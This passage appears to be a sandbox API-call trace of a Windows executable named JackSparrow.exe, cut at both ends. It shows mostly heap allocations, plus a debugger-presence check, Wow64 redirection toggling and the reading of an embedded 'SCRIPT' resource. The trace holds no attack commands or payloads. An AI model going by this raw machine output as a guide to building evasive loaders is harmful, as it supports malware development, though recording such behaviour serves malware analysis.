hHeap=0x770000, dwFlags=0x0, lpMem=0x793948 | out: hHeap=0x770000) returned 1 [0026.011] CloseHandle (hObject=0xf8) returned 1 [0026.012] IUnknown:Release (This=0x796170) returned 0x0 [0026.012] FreeLibrary (hLibModule=0x1270000) returned 1 [0026.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x781f88 | out: hHeap=0x770000) returned 1 [0026.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793928 | out: hHeap=0x770000) returned 1 [0026.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x783388 | out: hHeap=0x770000) returned 1 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x79a750 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783388 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796170 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793928 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796198 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7833b8 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793948 [0026.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7833b8 | out: hHeap=0x770000) returned 1 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7961e8 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7833b8 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x793db8 [0026.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796170 | out: hHeap=0x770000) returned 1 [0026.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793928 | out: hHeap=0x770000) returned 1 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a7e0 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793928 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a7f8 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793938 [0026.012] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796170 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a810 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793958 [0026.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a828 [0026.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a7e0 | out: hHeap=0x770000) returned 1 [0026.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793928 | out: hHeap=0x770000) returned 1 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a7e0 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793928 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793968 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x79abc8 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793978 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a840 [0026.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a7e0 | out: hHeap=0x770000) returned 1 [0026.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793928 | out: hHeap=0x770000) returned 1 [0026.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x783388 | out: hHeap=0x770000) returned 1 [0026.013] IsDebuggerPresent () returned 0 [0026.013] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x68f730, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x0) returned 0x35 [0026.013] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpszLongPath=0x68f730, cchBuffer=0x7fff | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe") returned 0x35 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783388 [0026.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793928 [0026.014] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x68f700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x0) returned 0x35 [0026.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x783388 | out: hHeap=0x770000) returned 1 [0026.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x79ade8 [0026.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796210 [0026.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x783388 [0026.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796238 [0026.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793988 [0026.014] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0026.014] GetProcAddress (hModule=0x76e10000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e3d650 [0026.014] Wow64DisableWow64FsRedirection (in: OldValue=0x69f69c | out: OldValue=0x69f69c*=0x0) returned 1 [0026.014] FreeLibrary (hLibModule=0x76e10000) returned 1 [0026.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jacksparrow.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x69f538, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0026.014] GetFileType (hFile=0xf8) returned 0x1 [0026.014] LoadLibraryExW (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", hFile=0x0, dwFlags=0x2) returned 0x1270000 [0026.014] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0026.015] GetProcAddress (hModule=0x76e10000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76e3d668 [0026.015] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0026.015] FreeLibrary (hLibModule=0x76e10000) returned 1 [0026.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x79ae60 [0026.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793998 [0026.015] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x69f6cc | out: ppstm=0x69f6cc*=0x796260) returned 0x0 [0026.015] FindResourceExW (hModule=0x1270000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x1338528 [0026.015] LoadResource (hModule=0x1270000, hResInfo=0x1338528) returned 0x13407b8 [0026.015] SizeofResource (hModule=0x1270000, hResInfo=0x1338528) returned 0x941a [0026.015] LockResource (hResData=0x13407b8) returned 0x13407b8 [0026.015] ISequentialStream:RemoteWrite (in: This=0x796260, pv=0x13407b8*=0xa3, cb=0x941a, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0026.015] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0026.015] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x79ae60, cb=0x18, pcbRead=0x69f624 | out: pv=0x79ae60*=0xa3, pcbRead=0x69f624*=0x18) returned 0x0 [0026.015] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f668, cb=0x4, pcbRead=0x69f624 | out: pv=0x69f668*=0x45, pcbRead=0x69f624*=0x4) returned 0x0 [0026.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793998 | out: hHeap=0x770000) returned 1 [0026.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ae60 | out: hHeap=0x770000) returned 1 [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f68c, cb=0x10, pcbRead=0x69f664 | out: pv=0x69f68c*=0x4d, pcbRead=0x69f664*=0x10) returned 0x0 [0026.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69f560 | out: lpSystemTimeAsFileTime=0x69f560*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.015] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.015] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efe0, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efe0*=0x6b, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eca0 | out: lpSystemTimeAsFileTime=0x69eca0*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efe8, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efe8*=0xa6, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69edd0, cb=0x34, pcbRead=0x69eda4 | out: pv=0x69edd0*=0xe1, pcbRead=0x69eda4*=0x34) returned 0x0 [0026.015] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eca0 | out: lpSystemTimeAsFileTime=0x69eca0*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.015] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efe8, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efe8*=0x19, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f014, cb=0x72, pcbRead=0x69eda4 | out: pv=0x69f014*=0x2c, pcbRead=0x69eda4*=0x72) returned 0x0 [0026.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eca0 | out: lpSystemTimeAsFileTime=0x69eca0*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.016] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efd8, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efd8*=0xbc, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.016] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efe0, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efe0*=0x6b, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eca0 | out: lpSystemTimeAsFileTime=0x69eca0*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efe8, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efe8*=0xaf, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69edd0, cb=0x26, pcbRead=0x69eda4 | out: pv=0x69edd0*=0xe6, pcbRead=0x69eda4*=0x26) returned 0x0 [0026.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eca0 | out: lpSystemTimeAsFileTime=0x69eca0*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69efe8, cb=0x4, pcbRead=0x69eda4 | out: pv=0x69efe8*=0x1d, pcbRead=0x69eda4*=0x4) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f014, cb=0x7a, pcbRead=0x69eda4 | out: pv=0x69f014*=0xa1, pcbRead=0x69eda4*=0x7a) returned 0x0 [0026.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eca0 | out: lpSystemTimeAsFileTime=0x69eca0*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f69b, cb=0x1, pcbRead=0x69efec | out: pv=0x69f69b*=0x1, pcbRead=0x69efec*=0x1) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f694, cb=0x4, pcbRead=0x69efec | out: pv=0x69f694*=0xee, pcbRead=0x69efec*=0x4) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f694, cb=0x4, pcbRead=0x69efec | out: pv=0x69f694*=0x71, pcbRead=0x69efec*=0x4) returned 0x0 [0026.016] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x69f694, cb=0x4, pcbRead=0x69efec | out: pv=0x69f694*=0xe7, pcbRead=0x69efec*=0x4) returned 0x0 [0026.016] IStream:RemoteSeek (in: This=0x796260, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0026.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x27ecd) returned 0x7b4298 [0026.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9252) returned 0x79ae60 [0026.017] ISequentialStream:RemoteRead (in: This=0x796260, pv=0x79ae60, cb=0x9252, pcbRead=0x69efec | out: pv=0x79ae60*=0x6d, pcbRead=0x69efec*=0x9252) returned 0x0 [0026.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x69eee8 | out: lpSystemTimeAsFileTime=0x69eee8*(dwLowDateTime=0x10232220, dwHighDateTime=0x1d5e3d9)) [0026.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20000) returned 0x7dc170 [0026.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x7fc178 [0026.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x80c180 [0026.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7dc170 | out: hHeap=0x770000) returned 1 [0026.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7fc178 | out: hHeap=0x770000) returned 1 [0026.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x80c180 | out: hHeap=0x770000) returned 1 [0026.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ae60 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x83d4) returned 0x79ae60 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1c) returned 0x7962b0 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7962b0 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7962b0 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a7e0 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7962d8 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a858 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a7e0 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x79a7e0 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a870 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793998 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a870 | out: hHeap=0x770000) returned 1 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x793998 | out: hHeap=0x770000) returned 1 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a7e0 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a7e0 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1e) returned 0x796300 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a870 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796328 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x793998 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796300 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a888 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a8a0 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a870 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a870 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a8b8 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a8d0 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a8e8 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7939a8 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a8b8 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a8b8 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a900 [0026.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a8d0 | out: hHeap=0x770000) returned 1 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a8d0 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a918 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a930 [0026.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a948 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7939b8 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a918 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a918 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a960 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a930 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a930 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7939c8 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a978 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a990 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3258 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7939c8 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a9a8 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a9c0 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x781f88 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7962b0 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a978 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12) returned 0x79a630 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79a9d8 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7962b0 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7939c8 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a9f0 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aa08 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9d8 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79a9d8 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x79aa20 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aa38 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3268 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa38 | out: hHeap=0x770000) returned 1 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3268 | out: hHeap=0x770000) returned 1 [0026.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa20 | out: hHeap=0x770000) returned 1 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aa20 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aa38 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe) returned 0x79aa50 [0026.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aa68 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aa80 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3268 [0026.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa50 | out: hHeap=0x770000) returned 1 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aa50 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aa98 [0026.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa68 | out: hHeap=0x770000) returned 1 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aa68 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aab0 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7a3640 [0026.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x781f88 | out: hHeap=0x770000) returned 1 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aac8 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aae0 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aaf8 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79ab10 [0026.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3278 [0026.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aae0 | out: hHeap=0x770000) returned 1 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aae0 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79ab28 [0026.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aaf8 | out: hHeap=0x770000) returned 1 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79aaf8 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79ab40 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79ab58 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe) returned 0x79ab70 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79ab88 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x79aba0 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3288 [0026.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab70 | out: hHeap=0x770000) returned 1 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79ab70 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a36e0 [0026.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab88 | out: hHeap=0x770000) returned 1 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x79ab88 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a36f8 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3710 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x79a630 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3728 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x796300 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7a3298 [0026.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3740 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a3758 [0026.029] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3728 | out: hHeap=0x770000) returned 1 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3728 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3770 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x7a3788 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x7a37a0 [0026.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 